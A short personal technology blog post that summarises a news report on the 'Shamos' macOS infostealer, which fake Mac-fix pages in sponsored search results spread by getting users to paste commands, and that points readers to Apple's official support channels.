There is a new piece of software that may not be wanted by Mac users. This software is known as an infostealer, and this infostealer can take practicly everything from the mac it wants.
The second paragraph highlights what it can do. It says:
The new malware, which is a variant of the Atomic macOS Stealer (AMOS), was developed by the cybercriminal group “COOKIE SPIDER,” and is used to steal data and credentials stored in web browsers, Keychain items, Apple Notes, and cryptocurrency wallets.
Crowdstrike has been monitoring this for some time now, and they go in to detail in the article what this thing does.
The threat actors prompt users to run these commands to install software or fix fake errors, but when executed, they actually download and execute the malware on the device.
GitHub is part of the problem by allowing this type of hosting to be on their platform to begin with. I try to do my best to know what my network has on it, and if there’s a problem, it gets delbt with either by me or the provider who runs it.
The ads or spoofed pages (mac-safer[.]com, rescue-mac[.]com) claim to provide help with macOS problems people are likely to search for, containing instructions directing them to copy and paste the command to fix the issue.
Apparently, these are pages in sponsored results, and not part of the general results.
The article does state to use official channels such as the Apple support forums or calling apple directly to get help. (800) 275-2273 is their telephone number.
The article says:
Instead of fixing anything, the command decodes a Base64-encoded URL and fetches a malicious Bash script from a remote server.
There’s much more. Fake Mac fixes trick users into installing new Shamos infostealer is the article talking about this if you are interested in reading it.
Thanks for reading!
Discover more from The Technology blog and podcast
Subscribe to get the latest posts sent to your email.